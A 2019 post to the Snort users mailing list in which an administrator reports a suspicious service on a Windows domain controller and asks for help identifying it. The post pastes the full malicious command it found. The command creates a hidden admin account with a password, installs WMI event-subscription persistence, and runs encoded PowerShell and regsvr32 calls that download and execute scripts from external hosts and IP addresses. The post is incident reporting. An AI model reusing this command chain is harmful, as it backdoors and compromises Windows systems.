Snort mailing list archives

Previous By Date Next
Previous By Thread Next

Bykn - Service on Windows Domain Controller

From: Prakash Kumar N via Snort-users <snort-users () lists snort org>
Date: Mon, 1 Apr 2019 12:40:22 +0530
Hi,

Today I'm seeing some unusual service is running in one of our Windows
2012R2 dc, suspecting some kind of external attack [ransomeware], is
somebody have any idea on this...?

[image: image.png]



cmd /c net1 user admin$ Zxcvbnm,.1234 /ad&net1 localgroup administrators
admin$ /ad&net1 localgroup administradores admin$ /ad&wmic
/NAMESPACE:"\root\subscription" PATH __EventFilter WHERE Name="fuckyoumm3"
DELETE&wmic /NAMESPACE:"\root\subscription" PATH ActiveScriptEventConsumer
WHERE Name="fuckyoumm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH
CommandLineEventConsumer WHERE Name="fuckyoumm4" DELETE&wmic
/NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding WHERE
Filter="__EventFilter.Name='fuckyoumm3'" DELETE&wmic
/NAMESPACE:"\root\subscription" PATH __EventFilter CREATE
Name="fuckyoumm3", EventNameSpace="root\cimv2",QueryLanguage="WQL",
Query="SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE
TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"&wmic
/NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer CREATE
Name="fuckyoumm4", CommandLineTemplate="cmd /c powershell.exe -nop -enc
"JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.exe
IEX (New-Object system.Net.WebClient).DownloadString('
http://wmi.1217bye.host/S.ps1&apos;)&powershell.exe IEX (New-Object
system.Net.WebClient).DownloadString('
http://173.208.139.170/s.txt&apos;)&powershell.exe IEX (New-Object
system.Net.WebClient).DownloadString('
http://35.182.171.137/s.jpg&apos;)||regsvr32 /u /s /i:
http://wmi.1217bye.host:8888/1.txt scrobj.dll&regsvr32 /u /s /i:
http://173.208.139.170/2.txt scrobj.dll&regsvr32 /u /s /i:
http://35.182.171.137/3.txt scrobj.dll"&wmic
/NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding CREATE
Filter="__EventFilter.Name="fuckyoumm3"",
Consumer="CommandLineEventConsumer.Name="fuckyoumm4""&start regsvr32 /s /u
/n /i:http://173.208.172.202:8888\s1.txt scrobj.dll

-- 
Thanks,
*PRAKASH KUMAR.N*
Mail: prakashkumar.n () gmail com* | *prakashkumar.n () live in


_______________________________________________
Snort-users mailing list
Snort-users () lists snort org
Go to this URL to change user options or unsubscribe:
https://lists.snort.org/mailman/listinfo/snort-users

        To unsubscribe, send an email to:
        snort-users-leave () lists snort org

Please visit http://blog.snort.org to stay current on all the latest Snort news!

Please follow these rules: https://snort.org/faq/what-is-the-mailing-list-etiquette
Previous By Date Next
Previous By Thread Next

Current thread: